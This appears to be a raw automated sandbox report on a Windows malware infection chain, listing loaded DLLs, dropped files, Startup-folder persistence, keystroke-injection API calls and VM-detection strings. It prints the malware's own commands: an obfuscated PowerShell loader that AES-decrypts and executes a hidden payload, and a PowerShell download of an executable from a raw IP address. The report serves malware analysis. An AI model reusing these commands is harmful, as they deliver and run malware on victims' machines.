Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Guard.exeSection loaded: version.dll
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dll
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dll
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dll
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dll
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dll
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dll
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dll
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, apphelp.dll, twext.dll, cscui.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, sspicli.dll, wintypes.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, rasadhlp.dll
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: s4PymYGgSh.lnk LNK file: ..\..\..\Windows\System32\forfiles.exe
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe
Source: Binary string: dvdplay.pdb source: mshta.exe

Data Obfuscation

Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean('[hex-encoded ciphertext removed]');$fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3)
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Code function: 14_2_00007FF74D036D1C LoadLibraryA,GetProcAddress,14_2_00007FF74D036D1C
Source: duydemo[1].4.dr Static PE information: real checksum: 0x5f0d should be: 0x1cb85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFAAB0C55D8 push eax; iretd 7_2_00007FFAAB0C5671
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Code function: 14_2_00007FF74D0678FD push rdi; ret 14_2_00007FF74D067904
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Code function: 14_2_00007FF74D067399 push rdi; ret 14_2_00007FF74D0673A2
Source: C:\Users\Public\Guard.exe Code function: 21_2_00A48B75 push ecx; ret 21_2_00A48B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 27_2_00F38B75 push ecx; ret 27_2_00F38B88

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\mshta.exe
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Users\Public\Guard.exe File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\duydemo[1]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Guard.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\BFmcYQ.exe

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Guard.exe
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Code function: 14_2_00007FF74D054514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,14_2_00007FF74D054514
Source: C:\Users\Public\Guard.exe Code function: 21_2_00AA59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,21_2_00AA59B3
Source: C:\Users\Public\Guard.exe Code function: 21_2_00A35EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,21_2_00A35EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 27_2_00F959B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,27_2_00F959B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 27_2_00F25EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,27_2_00F25EDA
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A433B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,21_2_00A433B7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1058
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2306
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6040
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3748
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2732
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3780
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4029
Source: C:\Windows\System32\mshta.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\duydemo[1]
Source: C:\Users\Public\Guard.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_21-100132
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe API coverage: 3.7 %
Source: C:\Users\Public\Guard.exe API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif API coverage: 4.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep count: 1058 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep count: 2306 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8072Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -12912720851596678s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3584Thread sleep count: 2732 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1660Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2704Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4180Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2344Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072Thread sleep count: 3780 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6360Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6276Thread sleep count: 4029 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0AC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,14_2_00007FF74D0AC7C0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D072F50 FindFirstFileExW,14_2_00007FF74D072F50
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0BA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,14_2_00007FF74D0BA874
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0B6428 FindFirstFileW,FindNextFileW,FindClose,14_2_00007FF74D0B6428
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0BA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,14_2_00007FF74D0BA4F8
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0BA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,14_2_00007FF74D0BA350
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0ABC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00007FF74D0ABC70
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0AB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00007FF74D0AB7C0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0B72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,14_2_00007FF74D0B72A8
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0B71F4 FindFirstFileW,FindClose,14_2_00007FF74D0B71F4
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A84005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00A84005
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8494A GetFileAttributesW,FindFirstFileW,FindClose,21_2_00A8494A
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,21_2_00A8C2FF
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,21_2_00A8CD9F
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8CD14 FindFirstFileW,FindClose,21_2_00A8CD14
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_00A8F5D8
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_00A8F735
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,21_2_00A8FA36
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A83CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00A83CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F74005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_00F74005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7494A GetFileAttributesW,FindFirstFileW,FindClose,27_2_00F7494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_00F7C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,27_2_00F7CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7CD14 FindFirstFileW,FindClose,27_2_00F7CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_00F7F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_00F7F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_00F7FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F73CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_00F73CE2
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D051D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,14_2_00007FF74D051D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000007.00000002.1695777876.000001EE22EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWte%SystemRoot%\system32\mswsock.dll754716D4B6C6E447878');$fgNcqNX.IV=New-Objectbyte[]16;$ckcAaXbLZ=$fgNcqNX.CreateDecryptor();$lGOPfxpiP=[Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk,0,$DLBqcOk.Length));&$lGOPfxpiP.Substring
Source: powershell.exe, 00000007.00000002.1695777876.000001EE22F04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\K
Source: powershell.exe, 00000013.00000002.2031671989.0000026D3654E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\S
Source: powershell.exe, 00000013.00000002.2031671989.0000026D3654E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
Source: mshta.exe, 00000004.00000003.1714744005.000002C2C9777000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 00000004.00000003.1719158237.000002C2C96D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1707086050.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720495666.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712666267.000002C2C96CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1715474320.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719251921.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714778759.000002C2C96CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720281906.000002C2C96D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2644299394.000001F097A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2650975336.000001F09D05B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000004.00000003.1712666267.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714778759.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720281906.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719158237.000002C2C9706000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
Source: powershell.exe, 00000013.00000002.2031671989.0000026D36523000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: Guard.exe, 00000015.00000002.2651128046.00000000038B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
Source: SwiftWrite.pif, 0000001B.00000002.2653022988.0000000004039000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\Guard.exeAPI call chain: ExitProcess graph end nodegraph_21-98343
